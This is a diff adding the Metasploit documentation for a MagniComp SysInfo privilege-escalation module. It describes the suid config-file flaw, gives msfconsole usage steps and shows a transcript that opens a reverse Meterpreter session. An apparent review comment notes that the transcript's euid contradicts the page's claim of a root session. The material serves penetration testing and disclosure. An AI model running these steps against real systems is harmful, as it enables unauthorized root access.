| 1 | +## Description |
| 2 | + |
| 3 | + This module attempts to gain root privileges on systems running MagniComp SysInfo versions prior to 10-H64. |
| 4 | + |
| 5 | + |
| 6 | +## Vulnerable Application |
| 7 | + |
| 8 | + [MagniComp SysInfo](https://www.magnicomp.com/sysinfo/) is a single system agent and viewer providing extensive IT asset inventory and configuration information for most major Linux, UNIX, Apple Macintosh, and Microsoft Windows platforms as well as leading NAS and SAN Storage Systems and logical volume software solutions. |
| 9 | + |
| 10 | + The `.mcsiwrapper` suid executable allows loading a config file using the `--configfile` argument. The `ExecPath` config directive is used to set the executable load path. This module abuses this functionality to set the load path resulting in execution of arbitrary code as root. |
| 11 | + |
| 12 | + This module has been tested successfully on SysInfo: |
| 13 | + |
| 14 | + * 10-H63 on Fedora 20 x86_64 |
| 15 | + * 10-GA on Solaris 10u11 x86 |
| 16 | + |
| 17 | + Installers: |
| 18 | + |
| 19 | + * https://www.magnicomp.com/cgi-bin/mcdownload.cgi |
| 20 | + * https://www.magnicomp.com/cgi-bin/mcdownload.cgi/Action=ListDDF |
| 21 | + |
| 22 | + |
| 23 | +## Verification Steps |
| 24 | + |
| 25 | + 1. Start `msfconsole` |
| 26 | + 2. Get a session |
| 27 | + 3. Do: `use exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc` |
| 28 | + 4. Do: `set SESSION [SESSION]` |
| 29 | + 5. Do: `check` |
| 30 | + 6. Do: `run` |
| 31 | + 7. You should get a new *root* session |
| 32 | + |
| 33 | + |
| 34 | +## Options |
| 35 | + |
| 36 | + **SESSION** |
| 37 | + |
| 38 | + Which session to use, which can be viewed with `sessions` |
| 39 | + |
| 40 | + **SYSINFO_DIR** |
| 41 | + |
| 42 | + Path to SysInfo directory (default: `/opt/sysinfo`) |
| 43 | + |
| 44 | + **WritableDir** |
| 45 | + |
| 46 | + A writable directory file system path. (default: `/tmp`) |
| 47 | + |
| 48 | + |
| 49 | +## Scenarios |
| 50 | + |
| 51 | + ``` |
| 52 | + msf > use exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc |
| 53 | + msf exploit(multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc) > set session 1 |
| 54 | + session => 1 |
| 55 | + msf exploit(multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc) > run |
| 56 | +
|
| 57 | + [*] Started reverse TCP handler on 172.16.191.244:4444 |
| 58 | + [*] Using target: Linux |
| 59 | + [*] Writing '/tmp/.0rk4PC/vFdxxuBVkh' (21 bytes) ... |
| 60 | + [*] Writing '/tmp/.0rk4PC/eoGVzYwGa' (207 bytes) ... |
| 61 | + [*] Executing payload... |
| 62 | + [*] Sending stage (857352 bytes) to 172.16.191.137 |
| 63 | + [*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.137:42229) at 2018-02-05 07:38:35 -0500 |
| 64 | + [+] Deleted /tmp/.0rk4PC/vFdxxuBVkh |
| 65 | + [+] Deleted /tmp/.0rk4PC/eoGVzYwGa |
| 66 | + [+] Deleted /tmp/.0rk4PC |
| 67 | +
|
| 68 | + meterpreter > getuid |
| 69 | + Server username: uid=0, gid=1000, euid=1000, egid=1000 |
| 70 | + meterpreter > sysinfo |
| 71 | + Computer : localhost.localdomain |
| 72 | + OS : Fedora 20 (Linux 3.19.8-100.fc20.x86_64) |
| 73 | + Architecture : x64 |
| 74 | + BuildTuple : i486-linux-musl |
| 75 | + Meterpreter : x86/linux |
| 76 | + meterpreter > |
| 77 | + ``` |
| 78 | + |
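Review bot: The Scenarios output at line 69 contradicts the claim at line 31 that the module yields a new *root* session: `Server username: uid=0, gid=1000, euid=1000, egid=1000` shows a real UID of 0 but an effective UID of 1000, so the session does not actually run with root privileges as captured. Either the module should drop to a fully privileged context before spawning the payload, or the documentation should state precisely what privilege level the session has and show a `getuid` transcript that matches. Smaller points: the Verification Steps mention `check` but no `check` output appears in the Scenarios transcript, so a short sample of the `check` result would help readers confirm the version-gating (prior to 10-H64) works; the WritableDir description at line 46 reads awkwardly and could simply be "A writable directory on the target file system (default: `/tmp`)"; and the doubled blank lines before each `##` heading are inconsistent with the single blank lines used elsewhere in the file.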